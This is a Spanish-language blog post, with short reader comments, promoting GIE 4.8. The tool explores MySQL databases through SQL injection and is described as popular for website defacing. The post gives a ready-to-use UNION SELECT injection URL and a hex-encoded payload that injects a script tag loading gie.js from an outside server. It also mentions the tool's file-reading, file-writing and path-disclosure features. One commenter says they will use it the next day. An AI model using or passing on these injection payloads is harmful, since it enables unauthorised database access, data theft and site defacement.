Se venía pidiendo a gritos algo de SQLi, con lo que aprovecho para traerles una herramienta ya muy extendida en ese submundo del defacing. De las manos de PonyMagic, salió la nueva versión el pasado 12 de Diciembre de GIE 4.8. Un explorador en modo gráfico para bases de datos MYSQL, vía SQLi incrustado en la inyección, además incorpora funciones de lectura de archivos utilizando fuerza bruta y entre otras como la de escritura de un archivo o full path disclosure.
La forma de empleo es muy simple, si creamos una consulta SQLi con la siguiente sintaxis.
http://webvulnerable.com/index.php?id=-1+union+select+0,1,2,3,4,5--
Se obtendrá algún valor que imprima resultados visibles en la página web.
Al ver que imprime en pantalla los valores 2 y 13, podremos agregar entonces el siguiente código en hexadecimal que hace una llamada al archivo gie.js, sustituyendo uno de los valores printeables por este, así cargará la interfaz en javascript para navegar entre las tablas.
((0x3c736372697074207372633d27687474703a2f2f6b727970746f73656375726974792e636f6d2e61722f6769652e6a73272f3e))
Si son curiosos pueden abrir Tamper Data para hacer más visible el funcionamiento de la herramienta.
De tal manera que la inyección quedaría así.
http://webvulnerable.com/index.php?id=-1+union+select+0,1,((0x3c736372697074207372633d27687474703a2f2f6b727970746f73656375726974792e636f6d2e61722f6769652e6a73272f3e)),3,4,5--
La interfaz es muy cómoda y agiliza notablemente el tiempo que podrías pasar buscando tablas.
Tienen la descarga del código fuente para su modificación desde aquí y desde Paste2 lo tienen interpretado.
Saludos 4n4les!
Muy bueno amigo. Lo voy a emplear mañana xD
ResponderEliminarSaludos!
wow esto está muy bien jeje, gracias 4n0 por la noticia, y a PoniMagic =)
ResponderEliminarajjaja ese 4n0 soy MichBukana esto me suena eehh! xD saludos amigo
ResponderEliminarMichBukana! totalmente! jajaj fue quien me hizo llegar la tool a mis ojos!
ResponderEliminarUn Saludo!